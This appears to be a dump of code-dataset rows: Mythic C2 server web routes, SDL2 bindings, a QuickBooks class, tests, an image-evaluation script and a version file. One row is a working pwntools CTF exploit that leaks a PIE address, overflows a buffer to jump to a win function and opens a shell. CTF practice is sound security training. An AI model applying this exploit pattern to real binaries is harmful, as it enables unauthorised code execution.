user_id=user_id,
)
if isinstance(refresh_token, bytes):
refresh_token = refresh_token.decode("utf-8")
token = await self.instance.auth.retrieve_refresh_token_from_request(request)
if refresh_token != token:
raise exceptions.AuthenticationFailed()
access_token, output = await self.responses.get_access_token_output(
request, user, self.config, self.instance
)
redirect_to = (
request.headers["referer"] if "referer" in request.headers else "/"
)
resp = response.redirect(redirect_to)
resp.cookies[self.config.cookie_access_token_name()] = access_token
resp.cookies[self.config.cookie_access_token_name()]["httponly"] = True
return resp
@mythic.route("/settings", methods=["GET"])
@inject_user()
@scoped("auth:user")
async def settings(request, user):
template = env.get_template("settings.html")
try:
content = template.render(
links=await respect_pivot(links, request),
name=user["username"],
** await getSchemes(request),
config=user["ui_config"],
view_utc_time=user["view_utc_time"],
)
return response.html(content)
except Exception as e:
logger.error(str(e))
return json({"status": "error", "error": "Failed to find operator"})
@mythic.route("/logout")
@inject_user()
@scoped("auth:user")
async def logout(request, user):
resp = response.redirect("/login")
del resp.cookies["access_token"]
del resp.cookies["refresh_token"]
operator = await app.db_objects.get(db_model.operator_query, id=user["id"])
if operator.current_operation is not None:
await app.db_objects.create(
db_model.OperationEventLog,
operator=None,
operation=operator.current_operation,
message="{} signed out".format(operator.username),
)
# now actually invalidate tokens
await invalidate_refresh_token(user["id"])
return resp
@mythic.exception(asyncio.CancelledError)
async def handle_cancellation(request, exception):
logger.info(
"Request {} was cancelled".format(str(request))
)
return json({"status": "error", "error": "Request was cancelled"}, status=500)
@mythic.exception(NotFound)
async def handler_404(request, exception):
return json({"status": "error", "error": "Not Found"}, status=404)
@mythic.exception(MethodNotSupported)
async def handler_405(request, exception):
return json({"status": "error", "error": "Session Expired, refresh"}, status=405)
@mythic.exception(RequestTimeout)
def request_timeout(request, exception):
return json({"status": "error", "error": "request timeout"})
@mythic.exception(exceptions.AuthenticationFailed)
async def handler_auth_failed(request, exception):
if "/new" in request.path or "webhook" in request.path or "/auth" in request.path or "/refresh" in request.path:
return json({"status": "error", "error": "Authentication failed", "message": "access-denied", "code": "access-denied"}, status=401)
else:
return response.redirect("/login")
@mythic.exception(Unauthorized)
async def handler_auth_failed(request, exception):
if "/new" in request.path or "webhook" in request.path or "/auth" in request.path or "/refresh" in request.path:
return json({"status": "error", "error": "Authentication failed", "message": "Unauthorized", "code": "forbidden"}, status=403)
else:
return response.redirect("/login")
@mythic.exception(SanicException)
def catch_all(request, exception):
logger.exception(
"Caught random exception within Mythic: {}, {}".format(exception, str(request))
)
return json({"status": "error", "error": "Mythic encountered an error"}, status=500)
@mythic.middleware("request")
async def check_ips(request):
if (
request.path in ["/login", "/auth", "/"]
or "/payloads/download/" in request.path
):
ip = ip_address(request.headers["x-real-ip"] if "x-real-ip" in request.headers else request.ip)
for block in mythic.config["ALLOWED_IPS"]:
if ip in block:
return
return json({"error": "Not Found"}, status=404)
@mythic.middleware("response")
async def add_cors(request, response):
response.headers["Access-Control-Allow-Headers"] = "authorization,content-type"
@mythic.listener("before_server_start")
async def setup_initial_info(sanic, loop):
logger.info("setup_initial_info")
app.db_objects = Manager(mythic_db, loop=loop)
await mythic_db.connect_async(loop=loop)
app.db_objects.database.allow_sync = True # logging.WARNING
await initial_setup()
asyncio.create_task(app.api.rabbitmq_api.start_listening())
async def initial_setup():
# create mythic_admin
import multiprocessing
try:
max_worker_connection = int(200 / (multiprocessing.cpu_count() + 1))
app.websocket_pool = await asyncpg.create_pool(mythic.config["DB_POOL_ASYNCPG_CONNECT_STRING"],
max_size=max_worker_connection)
# redis automatically creates a pool behind the scenes
app.redis_pool = redis.Redis(host=app.redis_host, port=app.redis_port, db=3)
# clear the database on start
keys = app.redis_pool.keys("*")
for k in keys:
app.redis_pool.delete(k)
operators = await app.db_objects.count(Operator.select())
if operators > 0:
logger.info("Users already exist, aborting initial install")
return
salt = str(uuid4())
password = await crypto.hash_SHA512(salt + <PASSWORD>)
try:
admin, created = await app.db_objects.get_or_create(
Operator, username=mythic_admin_user, password=password, admin=True, active=True, salt=salt
)
except Exception as e:
print(e)
return
logger.info("Created Admin")
# create default operation
operation, created = await app.db_objects.get_or_create(
Operation,
name=default_operation_name,
admin=admin,
complete=False,
)
logger.info("Created Operation")
await app.db_objects.get_or_create(
OperatorOperation, operator=admin, operation=operation
)
admin.current_operation = operation
await app.db_objects.update(admin)
logger.info("Registered Admin with the default operation")
logger.info("Started parsing ATT&CK data...")
file = open("./app/default_files/other_info/attack.json", "r")
attack = js.load(file) # this is a lot of data and might take a hot second to load
for obj in attack["techniques"]:
await app.db_objects.create(ATTACK, **obj)
file.close()
logger.info("Created all ATT&CK entries")
file = open("./app/default_files/other_info/artifacts.json", "r")
artifacts_file = js.load(file)
for artifact in artifacts_file["artifacts"]:
await app.db_objects.get_or_create(
Artifact, name=artifact["name"], description=artifact["description"]
)
file.close()
logger.info("Created all base artifacts")
logger.info("Successfully finished initial setup")
except Exception as e:
from app.api.operation_api import send_all_operations_message
asyncio.create_task(
send_all_operations_message(
message=f"Worker failed to initialize:\n {str(e)}",
level="warning"))
# /static serves out static images and files
mythic.static("/static", "./app/static", name="shared_files")
mythic.static("/favicon.ico", "./app/static/favicon.ico", name="favicon")
mythic.static("/strict_time.png", "./app/static/strict_time.png", name="strict_time")
mythic.static(
"/grouped_output.png", "./app/static/grouped_output.png", name="grouped_output"
)
mythic.static(
"/no_cmd_output.png", "./app/static/no_cmd_output.png", name="no_cmd_output"
)
mythic.static("/add_comment.png", "./app/static/add_comment.png", name="add_comment")
# add links to the routes in this file at the bottom
links["index"] = mythic.url_for("index")
links["login"] = links["WEB_BASE"] + "/login"
links["logout"] = mythic.url_for("logout")
links["settings"] = mythic.url_for("settings")
|
sdl2/blendmode.py | namelivia/py-sdl2 | 222 | 10923 | <gh_stars>100-1000
from ctypes import c_int
from .dll import _bind
__all__ = [
# Enums
"SDL_BlendMode",
"SDL_BLENDMODE_NONE", "SDL_BLENDMODE_BLEND", "SDL_BLENDMODE_ADD",
"SDL_BLENDMODE_MOD", "SDL_BLENDMODE_MUL", "SDL_BLENDMODE_INVALID",
"SDL_BlendOperation",
"SDL_BLENDOPERATION_ADD", "SDL_BLENDOPERATION_SUBTRACT",
"SDL_BLENDOPERATION_REV_SUBTRACT", "SDL_BLENDOPERATION_MINIMUM",
"SDL_BLENDOPERATION_MAXIMUM",
"SDL_BlendFactor",
"SDL_BLENDFACTOR_ZERO", "SDL_BLENDFACTOR_ONE",
"SDL_BLENDFACTOR_SRC_COLOR", "SDL_BLENDFACTOR_ONE_MINUS_SRC_COLOR",
"SDL_BLENDFACTOR_SRC_ALPHA", "SDL_BLENDFACTOR_ONE_MINUS_SRC_ALPHA",
"SDL_BLENDFACTOR_DST_COLOR", "SDL_BLENDFACTOR_ONE_MINUS_DST_COLOR",
"SDL_BLENDFACTOR_DST_ALPHA", "SDL_BLENDFACTOR_ONE_MINUS_DST_ALPHA",
# Functions
"SDL_ComposeCustomBlendMode"
]
SDL_BlendMode = c_int
SDL_BLENDMODE_NONE = 0x00000000
SDL_BLENDMODE_BLEND = 0x00000001
SDL_BLENDMODE_ADD = 0x00000002
SDL_BLENDMODE_MOD = 0x00000004
SDL_BLENDMODE_MUL = 0x00000008
SDL_BLENDMODE_INVALID = 0x7FFFFFFF
SDL_BlendOperation = c_int
SDL_BLENDOPERATION_ADD = 0x1
SDL_BLENDOPERATION_SUBTRACT = 0x2
SDL_BLENDOPERATION_REV_SUBTRACT = 0x3
SDL_BLENDOPERATION_MINIMUM = 0x4
SDL_BLENDOPERATION_MAXIMUM = 0x5
SDL_BlendFactor = c_int
SDL_BLENDFACTOR_ZERO = 0x1
SDL_BLENDFACTOR_ONE = 0x2
SDL_BLENDFACTOR_SRC_COLOR = 0x3
SDL_BLENDFACTOR_ONE_MINUS_SRC_COLOR = 0x4
SDL_BLENDFACTOR_SRC_ALPHA = 0x5
SDL_BLENDFACTOR_ONE_MINUS_SRC_ALPHA = 0x6
SDL_BLENDFACTOR_DST_COLOR = 0x7
SDL_BLENDFACTOR_ONE_MINUS_DST_COLOR = 0x8
SDL_BLENDFACTOR_DST_ALPHA = 0x9
SDL_BLENDFACTOR_ONE_MINUS_DST_ALPHA = 0xA
SDL_ComposeCustomBlendMode = _bind("SDL_ComposeCustomBlendMode", [SDL_BlendFactor, SDL_BlendFactor, SDL_BlendOperation, SDL_BlendFactor, SDL_BlendFactor, SDL_BlendOperation], SDL_BlendMode, added='2.0.6')
|
quickbooks/objects/companycurrency.py | varunbheemaiah/python-quickbooks | 234 | 11003 | <gh_stars>100-1000
from six import python_2_unicode_compatible
from .base import QuickbooksManagedObject, QuickbooksTransactionEntity, Ref, CustomField, MetaData
@python_2_unicode_compatible
class CompanyCurrency(QuickbooksManagedObject, QuickbooksTransactionEntity):
"""
QBO definition: Applicable only for those companies that enable multicurrency, a companycurrency object
defines a currency that is active in the QuickBooks Online company. One or more companycurrency objects
are active based on the company's multicurrency business requirements and correspond to the list
displayed by the Currency Center in the QuickBooks Online UI
"""
class_dict = {
"CustomField": CustomField,
"MetaData": MetaData,
}
qbo_object_name = "CompanyCurrency"
def __init__(self):
super(CompanyCurrency, self).__init__()
self.Id = None
self.Code = ""
self.Name = ""
self.Active = True
self.CustomField = None
self.MetaData = None
def __str__(self):
return self.Name
def to_ref(self):
ref = Ref()
ref.name = self.Name
ref.type = self.qbo_object_name
ref.value = self.Id
return ref
|
atlas/foundations_contrib/src/test/archiving/test_artifact_downloader.py | DeepLearnI/atlas | 296 | 11007 |
from foundations_spec import *
from unittest.mock import call
class TestArtifactDownloader(Spec):
mock_archiver = let_mock()
make_directory_mock = let_patch_mock('os.makedirs')
@let
def source_directory(self):
return self.faker.uri_path()
@let
def download_directory(self):
return self.faker.uri_path()
@let
def artifact_downloader(self):
from foundations_contrib.archiving.artifact_downloader import ArtifactDownloader
return ArtifactDownloader(self.mock_archiver)
@let
def mock_foundations_files(self):
return [
'foundations/a',
'foundations/b',
'foundations_contrib/c',
'foundations_contrib/d',
'foundations_events/e',
'foundations_events/f',
'foundations_internal/g',
'foundations_internal/h',
'jobs/i',
'jobs/j',
'model_serving/k',
'model_serving/l',
'venv/m',
'venv/n',
'docker_image_version.sh',
'download_gui_images.sh',
'foundations_gui.sh',
'foundations_package_manifest.yaml',
'foundations_requirements.txt',
'job.tgz',
'run.env',
'run.sh',
'p.bin',
'q.bin',
'template/t',
'template/u',
]
def test_downloads_single_file_to_specified_directory(self):
self._mock_file_list(['path/to/my/file'])
self.artifact_downloader.download_files('', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_with('path/to/my/file', self.download_directory + '/path/to/my/file')
def test_downloads_multiple_files_to_specified_directory(self):
self._mock_file_list(['different/file', 'other/different/file'])
self.artifact_downloader.download_files('', self.download_directory)
first_file_download = call('different/file', self.download_directory + '/different/file')
second_file_download = call('other/different/file', self.download_directory + '/other/different/file')
self.mock_archiver.fetch_persisted_file.assert_has_calls([first_file_download, second_file_download])
def test_ensures_target_directory_exists(self):
self._mock_file_list(['path/to/my/file'])
self.artifact_downloader.download_files('', self.download_directory)
self.make_directory_mock.assert_called_with(self.download_directory + '/path/to/my', exist_ok=True)
def test_downloads_multiple_files_to_specified_directory(self):
self._mock_file_list(['different/file', 'other/different/file'])
self.artifact_downloader.download_files('', self.download_directory)
first_dirctory_creation = call(self.download_directory + '/different', exist_ok=True)
second_dirctory_creation = call(self.download_directory + '/other/different', exist_ok=True)
self.make_directory_mock.assert_has_calls([first_dirctory_creation, second_dirctory_creation])
def test_downloads_only_files_with_specified_source_directory(self):
self._mock_file_list(['different/file', 'other/different/file'])
self.artifact_downloader.download_files('other/', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_once_with('other/different/file', self.download_directory + '/other/different/file')
def test_downloads_only_files_with_specified_source_directory_with_different_source_directory(self):
self._mock_file_list(['different/file', 'other/different/file'])
self.artifact_downloader.download_files('different/', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_once_with('different/file', self.download_directory + '/different/file')
def test_download_does_not_include_foundations_files(self):
for foundations_file in self.mock_foundations_files:
self._mock_file_list(['path/to/some/file', foundations_file])
self.artifact_downloader.download_files('', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_with('path/to/some/file', self.download_directory + '/path/to/some/file')
def test_download_includes_config_yamls(self):
for foundations_file in self.mock_foundations_files:
self._mock_file_list(['a.config.yaml', foundations_file])
self.artifact_downloader.download_files('', self.download_directory)
self.mock_archiver.fetch_persisted_file.assert_called_with('a.config.yaml', self.download_directory + '/a.config.yaml')
def _mock_file_list(self, file_list):
self.mock_archiver.fetch_miscellaneous = ConditionalReturn()
self.mock_archiver.fetch_miscellaneous.return_when(file_list, 'job_artifact_listing.pkl') |
tests/test_git_commit_one_file.py | mubashshirjamal/code | 1,582 | 11009 | <reponame>mubashshirjamal/code
# -*- coding: utf-8 -*-
import os
from vilya.models.project import CodeDoubanProject
from vilya.models import git
from tests.base import TestCase
from tests.utils import mkdtemp
from vilya.libs import gyt
from vilya.libs.permdir import get_repo_root
class TestGit(TestCase):
@property
def u(self):
return self.addUser()
def _path(self, name):
return os.path.join(get_repo_root(), '%s.git' % name)
def _path_work_tree(self, name):
return os.path.join(get_repo_root(), '%s.work_tree' % name)
def _repo(self, name, bare=True):
git_path = self._path(name)
if bare:
work_tree_path = None
else:
work_tree_path = self._path_work_tree(name)
if not os.path.exists(work_tree_path):
os.mkdir(work_tree_path)
try:
CodeDoubanProject.create_git_repo(git_path)
except:
pass
repo = git.GitRepo(git_path, work_tree=work_tree_path)
return repo
def _commit(self, repo, filename, content='testcontent',
message='testmessage'):
# TODO allow commiting more than one file
assert os.path.exists(repo.work_tree), \
"repo.work_tree must exist, check if repo has been created with bare=False" # noqa
path = os.path.join(repo.work_tree, filename)
dir_ = os.path.dirname(path)
if not os.path.exists(dir_):
os.makedirs(os.path.dirname(path))
f = open(path, 'w')
f.write(content)
f.close()
rep2 = gyt.repo(repo.path, repo.work_tree, bare=False)
rep2.call(['add', filename])
rep2.call(['commit', filename, '-m', message], _env=self.env_for_git)
return gyt.repo(repo.path).sha()
def test_simple_commit(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
src = repo.get_src('testfile1')
assert src == ('blob', u'content1')
repo.commit_one_file('testfile1', 'content1 modified',
'change1', self.u, orig_hash=hash('content1'))
src = repo.get_src('testfile1')
assert src == ('blob', u'content1 modified')
def test_simple_commit_do_not_delete_other_files(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
self._commit(repo, 'testfile2', 'content2', 'msg2')
repo.commit_one_file('testfile1', 'content1 modified',
'change1', self.u, orig_hash=hash('content1'))
src = repo.get_src('testfile1')
assert src == ('blob', u'content1 modified')
type_, files = repo.get_src('')
assert any(d['path'] == 'testfile2' for d in files), \
"testfile2 should exists in root tree"
src = repo.get_src('testfile2')
assert src == ('blob', u'content2')
def test_commit_in_inner_directory(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'test/file1', 'content1', 'msg1')
src = repo.get_src('test/file1')
assert src == ('blob', u'content1')
repo.commit_one_file('test/file1', 'content1 modified',
'change1', self.u, orig_hash=hash('content1'))
src = repo.get_src('test/file1')
assert src == ('blob', u'content1 modified')
def test_create_file(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'file1', 'content1', 'msg1')
repo.commit_one_file(
'file2', 'content2 created', 'create1', self.u)
assert repo.cat('HEAD:file1') == 'content1'
assert repo.cat('HEAD:file2') == 'content2 created'
def test_create_first_file(self):
repo = self._repo('test', bare=False)
repo.commit_one_file(
'file1', 'content1 created', 'create1', self.u)
assert repo.cat('HEAD:file1') == 'content1 created'
def test_create_first_file_and_more(self):
repo = self._repo('test', bare=False)
repo.commit_one_file(
'file1', 'content1 created', 'create1', self.u)
repo.commit_one_file(
'file2', 'content2 created', 'create2', self.u)
repo.commit_one_file(
'file3', 'content3 created', 'create3', self.u)
repo.commit_one_file(
'file4', 'content4 created', 'create4', self.u)
assert repo.cat('HEAD:file1') == 'content1 created'
assert repo.cat('HEAD:file2') == 'content2 created'
assert repo.cat('HEAD:file3') == 'content3 created'
assert repo.cat('HEAD:file4') == 'content4 created'
def test_commit_file_on_dirty_index(self):
repo = self._repo('test', bare=False)
repo.commit_one_file(
'file1', 'content1 created', 'create1', self.u)
repo.commit_one_file(
'file2', 'content2 created', 'create2', self.u)
repo.commit_one_file(
'file1', 'content1 modified', 'modify1', self.u)
# Now artificially rewind the index tree state
repo.call('read-tree HEAD^')
repo.commit_one_file(
'file2', 'content2 modified', 'modify2', self.u)
# the latest commit should not have anything related to file1
assert 'file1' not in repo.call('log -p -n1')
def test_create_file_in_dir(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'test/file1', 'content1', 'msg1')
repo.commit_one_file(
'test/file2', 'content2 created', 'create1', self.u)
assert repo.cat('HEAD:test/file1') == 'content1'
assert repo.cat('HEAD:test/file2') == 'content2 created'
def test_simple_commit_in_branch(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
tmp_branch = repo.temp_branch_name()
repo.commit_one_file('testfile1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'),
branch=tmp_branch)
with mkdtemp() as tmpdir:
gyt.call(['git', 'clone', repo.path, tmpdir])
repo_check = gyt.repo(tmpdir, bare=False)
src = repo_check.call('show HEAD:testfile1')
assert src == u'content1'
repo_check.call('checkout master')
src = repo_check.call('show HEAD:testfile1')
assert src == u'content1'
repo_check.call('checkout %s' % tmp_branch)
src = repo_check.call('show HEAD:testfile1')
assert src == u'content1 modified'
repo_check.call('checkout master')
src = repo_check.call('show HEAD:testfile1')
assert src == u'content1'
def test_simple_commit_in_branch_in_subdir(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'test/file1', 'content1', 'msg1')
tmp_branch = repo.temp_branch_name()
repo.commit_one_file('test/file1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'),
branch=tmp_branch)
with mkdtemp() as tmpdir:
gyt.call(['git', 'clone', repo.path, tmpdir])
repo_check = gyt.repo(tmpdir, bare=False)
src = repo_check.call('show HEAD:test/file1')
assert src == u'content1'
repo_check.call('checkout master')
src = repo_check.call('show HEAD:test/file1')
assert src == u'content1'
repo_check.call('checkout %s' % tmp_branch)
src = repo_check.call('show HEAD:test/file1')
assert src == u'content1 modified'
repo_check.call('checkout master')
src = repo_check.call('show HEAD:test/file1')
assert src == u'content1'
def test_simple_commit_in_branch_creates_branch(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
assert repo.get_branches() == ['master']
tmp_branch = repo.temp_branch_name()
repo.commit_one_file('testfile1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'),
branch=tmp_branch)
assert repo.get_branches() == ['master', tmp_branch]
def test_simple_commit_in_branch_and_delete_branch(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
tmp_branch = repo.temp_branch_name()
repo.commit_one_file('testfile1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'),
branch=tmp_branch)
assert tmp_branch in repo.get_branches()
repo.remove_temp_branch(tmp_branch)
assert tmp_branch not in repo.get_branches()
assert repo.get_branches() == ['master']
def test_simple_commit_in_another_branch(self):
repo = self._repo('test', bare=False)
self._commit(repo, 'testfile1', 'content1', 'msg1')
branch = 'mybranch'
repo.commit_one_file('testfile1', 'content1 modified', 'change1',
self.u, orig_hash=hash('content1'), branch=branch)
assert branch in repo.get_branches()
assert set(repo.get_branches()) == set(['master', branch])
|
sunshinectf2020/speedrun/exploit_05.py | nhtri2003gmail/ctf-write-ups | 101 | 11025 | <reponame>nhtri2003gmail/ctf-write-ups<filename>sunshinectf2020/speedrun/exploit_05.py
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./chall_05')
if not args.REMOTE:
p = process(binary.path)
else:
p = remote('chal.2020.sunshinectf.org', 30005)
p.sendlineafter('Race, life\'s greatest.\n','foobar')
p.recvuntil('Yes I\'m going to win: ')
_ = p.recvline().strip()
main = int(_,16)
binary.address = main - binary.sym.main
log.info('binary.address: ' + hex(binary.address))
payload = b''
payload += 56 * b'A'
payload += p64(binary.sym.win)
p.sendline(payload)
p.interactive()
|
CompareWHDR.py | Z7Gao/InverseRenderingOfIndoorScene | 171 | 11038 | <filename>CompareWHDR.py
import numpy as np
import sys
import json
import glob
import os.path as osp
import cv2
def compute_whdr(reflectance, judgements, delta=0.1):
points = judgements['intrinsic_points']
comparisons = judgements['intrinsic_comparisons']
id_to_points = {p['id']: p for p in points}
rows, cols = reflectance.shape[0:2]
error_sum = 0.0
error_equal_sum = 0.0
error_inequal_sum = 0.0
weight_sum = 0.0
weight_equal_sum = 0.0
weight_inequal_sum = 0.0
for c in comparisons:
# "darker" is "J_i" in our paper
darker = c['darker']
if darker not in ('1', '2', 'E'):
continue
# "darker_score" is "w_i" in our paper
weight = c['darker_score']
if weight <= 0.0 or weight is None:
continue
point1 = id_to_points[c['point1']]
point2 = id_to_points[c['point2']]
if not point1['opaque'] or not point2['opaque']:
continue
# convert to grayscale and threshold
l1 = max(1e-10, np.mean(reflectance[int(point1['y'] * rows), int(point1['x'] * cols), ...]))
l2 = max(1e-10, np.mean(reflectance[int(point2['y'] * rows), int(point2['x'] * cols), ...]))
# convert algorithm value to the same units as human judgements
if l2 / l1 > 1.0 + delta:
alg_darker = '1'
elif l1 / l2 > 1.0 + delta:
alg_darker = '2'
else:
alg_darker = 'E'
if darker == 'E':
if darker != alg_darker:
error_equal_sum += weight
weight_equal_sum += weight
else:
if darker != alg_darker:
error_inequal_sum += weight
weight_inequal_sum += weight
if darker != alg_darker:
error_sum += weight
weight_sum += weight
if weight_sum:
return (error_sum / weight_sum), error_equal_sum/( weight_equal_sum + 1e-10), error_inequal_sum/(weight_inequal_sum + 1e-10)
else:
return None
#root = './testReal_cascade0_black_height120_width160/cascade0/iiw/'
root = 'IIW_cascade1/results_brdf2_brdf1/'
rootGt = '/home/zhl/CVPR20/Resubmission/Dataset/IIW/iiw-dataset/data/'
suffix = 'albedoBS1.png'
count = 0.0
whdr_sum = 0.0
whdr_mean = 0.0
img_list = glob.glob(osp.join(root, '*_%s' % suffix ) )
for img_path in img_list:
#load CGI precomputed file
judgement_path = osp.join(rootGt, img_path.split('/')[-1].split('_')[0] + '.json' )
judgements = json.load(open(judgement_path) )
count+=1.0
ourR = cv2.imread(img_path ).astype(np.float32 ) / 255.0
whdr, _, _ = compute_whdr(ourR, judgements )
whdr_sum += whdr
print('img_path: {0}, whdr: current {1} average {2}'.
format(img_path.split('/')[-1].split('_')[0], whdr, whdr_sum / count ) )
whdr_mean = whdr_sum / count
print('whdr ours: {0}'.format(whdr_mean ) )
|
theonionbox/stamp.py | ralphwetzel/theonionbox | 120 | 11039 | __title__ = 'The Onion Box'
__description__ = 'Dashboard to monitor Tor node operations.'
__version__ = '20.2'
__stamp__ = '20200119|095654'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.